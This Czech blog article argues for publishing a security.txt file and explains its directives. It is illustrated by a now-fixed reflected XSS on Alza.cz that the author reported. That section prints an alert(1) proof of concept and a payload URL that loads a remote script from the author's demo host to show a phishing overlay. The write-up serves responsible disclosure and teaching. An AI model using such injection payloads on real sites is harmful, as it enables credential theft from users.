K čemu je soubor security.txt

Přidejte si na web soubor security.txt a umístěte do něj správné kontaktní údaje, ať lidé, kteří chtějí nahlásit bezpečnostní chyby, nemusí dlouze studovat, kam report poslat. K čemu takové informace jsou, vám ukážu na jednom konkrétním příkladu.

Text vyšel původně na autorově webu.

Občas někdo najde nějakou zranitelnost a chtěl by ji nahlásit, ať ji výrobce nebo vývojář může opravit. Koncem roku 2017 jsem pár takových drobných chyb také objevil.

Nalezení zranitelnosti

V sobotu 16. prosince jsem reportoval zranitelnost Cross-Site Scripting (XSS) na vcelku známém webu Alza.cz 👽. Chyba spočívala v tom, že se neošetřená adresa vypsala do Not Found stránky mezi značky <script> a </script>, konkrétně do řetězce, který se posílá do Google Analytics jako parametr události. Kód na adrese https://www.alza.cz/foo vypadá přibližně takhle:

<script>
ga('send', 'event', 'Error404', 'http://www.alza.cz/foo');
</script>

Stačilo do browseru zadat https://www.alza.cz/foo?');+alert(1);+// a alert spatřil světlo světa:

<script>
ga('send', 'event', 'Error404', 'https://www.alza.cz/foo?'); alert(1); //');
</script>

Jenže alert(1) nedokáže moc dobře ukázat možnosti vloženého JavaScriptu, tak jsem připravil názorné demo, které po kliknutí na zákeřný odkaz zobrazí alzácké přihlašovací okno. Při pokusu vyplnit e-mail a heslo nebo po stisknutí tlačítka „Přihlásit“ vyskočila hláška, že jde o ukázku phishingu a nic se nikam neposlalo. Mohlo by, JavaScript by mohl třeba změnit atribut action a přihlašovací údaje by se odeslaly třeba na útočníkův web, ale to nebylo smyslem ukázky.

Zákeřný odkaz s ukázkou vypadal takto (dal by se samozřejmě zkrátit nějakým zkracovačem adres):

'https://www.alza.cz/foo?');d=document;s=d.createElement('script');s.src='https://baz.xss.sk/js';d.getElementsByTagName('head')[0].appendChild(s);//

A konečně na závěr varovná hláška překrývající přihlašovací formulář:

Nahlášení chyby

Chybu jsem chtěl nahlásit, ale musel jsem nejdřív zjistit komu. Na uživatelskou podporu popis bezpečnostních chyb posílat nechcete, nevěděli by, co s tím. Tak jsem začal hledat a po nějaké době jsem narazil na Vladimíra Dědka, ředitele webového a mobilního vývoje. No jo, ale kdo to je, jak se chová, pochopí, o co mi jde? Po další chvíli gůglování jsem narazil na video, ve kterém Jirka Rostecký z Mladého podnikatele rozebírá s Vladimírem různé vývojářské věci, což mě utvrdilo, že Vladimír je můj člověk. Poslal jsem mu stručný e-mail s popisem chyby a vrátil se k tomu, co jsem chtěl původně dělat.

Odpověď přišla hned druhý den (v neděli!) ráno. Alza chybu během pár dní opravila, přístup k problému byl super, komunikace taky a za to všechno jí patří velký dík. Alza teda zareagovala podobně rychle jako DomainTools, kam jsem hlásil podobnou chybu v pátek před Vánocemi.

Schválně si tipněte, co mi trvalo nejdéle: najít chybu, vyrobit demo, nebo zjistit, komu chybu nahlásit?

 je správně, nejvíc času mi zabralo nalézt, komu chybu vlastně popsat. Aby popisu i závažnosti rozuměl a aby na mě rovnou neposílal firemní právníky. Když jsem v podstatě náhodou našel uniklá data z hostingu Czechia od Zoneru, tak jsem taky sháněl správný kontakt celkem dlouho. Od podpory, od které jsem chtěl získat speciální adresu na hlášení bezpečnostních incidentů, jsem se dozvěděl, že žádnou takovou adresu nemají a že to mám poslat nešifrovaně klasicky na support, že se mi ozvou zpět. Čemuž na jednu stranu rozumím, na druhou stranu to leckoho může odradit a pak může udělat zoufalost, které by třeba později mohl litovat.

Chápu, že na stránce „O nás“ nebo „Kontakty“ asi ve většině případů netoužíte mít odkaz „Sem posílejte hlášení bezpečnostních chyb“, ale jak dát světu najevo, kam s ním? Asi nechcete, aby se vás lidi veřejně na Twitteru ptali, kam mají chyby posílat, tak jako jsem to udělal při pokusu reportovat problémy certifikační autoritě AlwaysOnSSL. Výpis z whois často obsahuje neveřejné údaje nebo pro tento účel nesprávné osoby.

security.txt

Problém se pokusil vyřešit Ed Foudil. Vytvořil návrh standardu security.txt (přesný název zní „A Method for Web Security Policies“, brzy by mohl vyjít jako RFC), což je ve zkratce soubor security.txt, ze kterého se dozvíte kam a jak chyby hlásit.

Soubor security.txt musí být na předvídatelném místě, pro weby to je adresář /.well-known/. Ten je definován v RFC 5785 a slouží právě jako základní adresář pro „dobře známá“ umístění. Používá jej např. KeyBase i certifikační autorita Let’s Encrypt pro ověření domény a další. Cesta k mému souboru security.txt je tedy https://www.michalspacek.cz/.well-known/security.txt, z „rootu“, tedy z /security.txt je doporučeno nastavit přesměrování. Na interních serverech a souborových systémech mimo web můžete mít soubor .security.txt (s tečkou na začátku) rovnou v rootu.

Contact

V souboru jsou uvedeny direktivy a hodnoty oddělené dvojtečkou, přičemž jedna direktiva může obsahovat jen jednu hodnotu (např. adresu), ale můžete uvést více stejných direktiv s různými hodnotami, každou dáte na samostatný řádek, přičemž každá řádka musí končit znaky CRLF nebo jen LF. Soubor musí obsahovat alespoň direktivu Contact, jako hodnotu můžete uvést e-mailovou adresu, telefonní číslo nebo webovou stránku s dalšími informacemi. U mě vypadají direktivy Contacttakhle:

Contact: https://www.michalspacek.cz/kontakt
Contact: https://www.michalspacek.com/contact

V souboru mám i odkaz na Twitter a Facebook, zde jsem je pro jednoduchost vynechal.

Encryption

Pomocí direktivy Encryption můžete (a měli byste) přidat odkaz na váš PGP klíč, kterým je možné komunikaci zašifrovat. U mě vypadá takto:

Encryption: https://www.michalspacek.cz/key.asc

Signature

Soubor security.txt můžete podepsat (třeba pomocí gpg --detach-sign security.txt) a podpis přidat např. do souboru security.txt.sig, který také umístíte do adresáře /.well-known/. Odkázat na něj můžete pomocí direktivy Signature. Nezapomeňte soubor podepsat znovu po každé i sebemenší změně.

Policy

Do Policy můžete přidat odkaz na „pravidla hry“, bezpečnostní politiku nebo pravidla hlášení chyb.

Acknowledgement

Jestli máte „zeď slávy“ se jmény firem nebo lidí, kteří vám pomohli chybu najít a opravit (má ji např. T-Mobile), sem můžete dát odkaz. Pro jednoduchý příklad se podívejte do security.txt již zmíněné AlwaysOnSSL.

Hiring

Pokud sháníte nějaké lidi, profíky na bezpečnost, tak sem můžete dát odkaz na stránku s inzerátem nebo seznamem volných pozic.

✅ Přidat security.txt

Jestli se vám dneska nechce nic dělat, tak aspoň přidejte tenhle soubor (což předpokládá, že víte, kam mají hlášení o bezpečnostních chybách chodit a můžete to vykázat jako „zlepšení vztahu se security komunitou a zjednodušení hlášení chyb“). A když se vám chce dělat něco jiného, tak ten soubor přidejte alespoň zítra. Nikdy nevíte, kdy ho budu potřebovat :-)

K povinné direktivě Contact doporučuji přidat i Encryption (tedy pokud máte šifrovací klíč), zbytek můžete použít podle situace.

Na webu securitytxt.org najdete jednoduchý generátor obsahu souboru, inspirovat se můžete i u , na Have I Been Pwned?Report-URI nebo u Googlu1Passwordu a Facebooku. Informace v security.txt má i česká hostingovka Active24 a jednoduchý soubor najdete i na webu jedné švýcarské banky.

Školení bezpečnosti

Autor článku pořádá školení:

Michal je webový vývojář a bezpečnostní p̶r̶ů̶výzkumník. První webové stránky vytvořil když ještě zuřila První válka prohlížečů, ve které to Netscape Navigator prohrál proti Internet Exploreru. Pořádá školení, zajímá ho bezpečnost a výkon, staví, boří a testuje webové aplikace. Přednášel na více než 70 konferencích a akcích, včetně konference WebExpo v Praze a konference Passwords v Las Vegas, na obou opakovaně.

Komentáře: 15

Přehled komentářů

Mlocik97
TomasVotruba Skvělý nápad!
Ja Re: Skvělý nápad!
Michal Špaček Re: Skvělý nápad!
TomasVotruba Re: Skvělý nápad!
fabiancz Zdrojak security.txt not found ;)
Martin Hassman Re: Zdrojak security.txt not found ;)
Martin Hassman Re: Zdrojak security.txt not found ;)
Michal Špaček Re: Zdrojak security.txt not found ;)
Tin Článek má chybu 500
Martin Hassman Re: Článek má chybu 500
Tobiáš Štancel
Mlocik97 Re: Mýliš sa
Michal Špaček Re:
lenoch Re:
Zdroj: https://zdrojak.cz/?p=21191